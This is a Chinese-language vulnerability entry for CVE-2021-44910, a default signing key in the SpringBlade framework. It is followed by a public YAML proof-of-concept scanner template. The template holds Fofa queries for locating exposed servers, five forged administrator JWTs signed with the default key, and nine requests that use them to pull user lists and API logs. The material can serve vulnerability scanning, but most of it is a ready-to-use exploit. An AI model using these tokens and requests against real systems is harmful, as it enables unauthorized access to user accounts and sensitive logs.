漏洞描述
SpringBlade 框架存在默认SIGN_KEY,攻击者可利用漏洞获取用户账号密码日志等敏感信息。
Fofa: body="saber/iconfont.css" || body="Saber 将不能正常工作"||title="Sword Admin"||body="We're sorry but avue-data doesn't work"
CVE-2021-44910: SpringBlade 框架默认 SIGN_KRY 秘钥漏洞
PoC代码[已公开]
id: CVE-2021-44910
info:
name: SpringBlade 框架默认 SIGN_KRY 秘钥漏洞
author: zan8in
severity: high
verified: true
description: |-
SpringBlade 框架存在默认SIGN_KEY,攻击者可利用漏洞获取用户账号密码日志等敏感信息。
Fofa: body="saber/iconfont.css" || body="Saber 将不能正常工作"||title="Sword Admin"||body="We're sorry but avue-data doesn't work"
reference:
- https://forum.butian.net/share/973
tags: cve,cve2021,bypass,springblade
created: 2023/12/12
set:
token1: "bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSJ9.-XHkGTDfmGOdB8DNKwcCgWIfcR8Ln4hs09CVDslv1ATodR2Mjmjrq6KCysoK-sw3zf2EwATzdgxGXNGxfmj9wg"
token2: "bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ"
token3: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.5qFj53pqhIZVccg_h0WAvd-FAjG7sDwfVUe5gPBHa0g
token4: eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk
token5: eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.kol9scDVwLDE8U3mM_j8O4UYrpdUc9_Zw935g7Nb979DfRuanai1UeKsK2zCKuR77Otryi0sGzBfGANDbLseBg
rules:
r0:
request:
method: GET
path: /api/blade-user/user-list
headers:
Blade-Auth: "{{token1}}"
expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
r1:
request:
method: GET
path: /api/blade-user/user-list
headers:
Blade-Auth: "{{token2}}"
expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
r2:
request:
method: GET
path: /api/blade-log/api/list
headers:
Blade-Auth: "{{token1}}"
expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"params":') && response.body.bcontains(b'"msg":')
r3:
request:
method: GET
path: /api/blade-system/user/user-list
headers:
Blade-Auth: "{{token1}}"
expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
r4:
request:
method: GET
path: /api/blade-system/user/user-list
headers:
Blade-Auth: "{{token2}}"
expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
r5:
request:
method: GET
path: /api/blade-system/user/api/list
headers:
Blade-Auth: "{{token1}}"
expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"params":') && response.body.bcontains(b'"msg":')
r6:
request:
method: GET
path: /api/blade-user/user-list
headers:
Blade-Auth: "{{token3}}"
expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
r7:
request:
method: GET
path: /api/blade-user/user-list
headers:
Blade-Auth: "{{token4}}"
expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
r8:
request:
method: GET
path: /api/blade-user/user-list
headers:
Blade-Auth: "{{token5}}"
expression: response.status == 200 && response.body.bcontains(b"\"code\":200") && response.body.bcontains(b'"success":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"createUser":')
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8()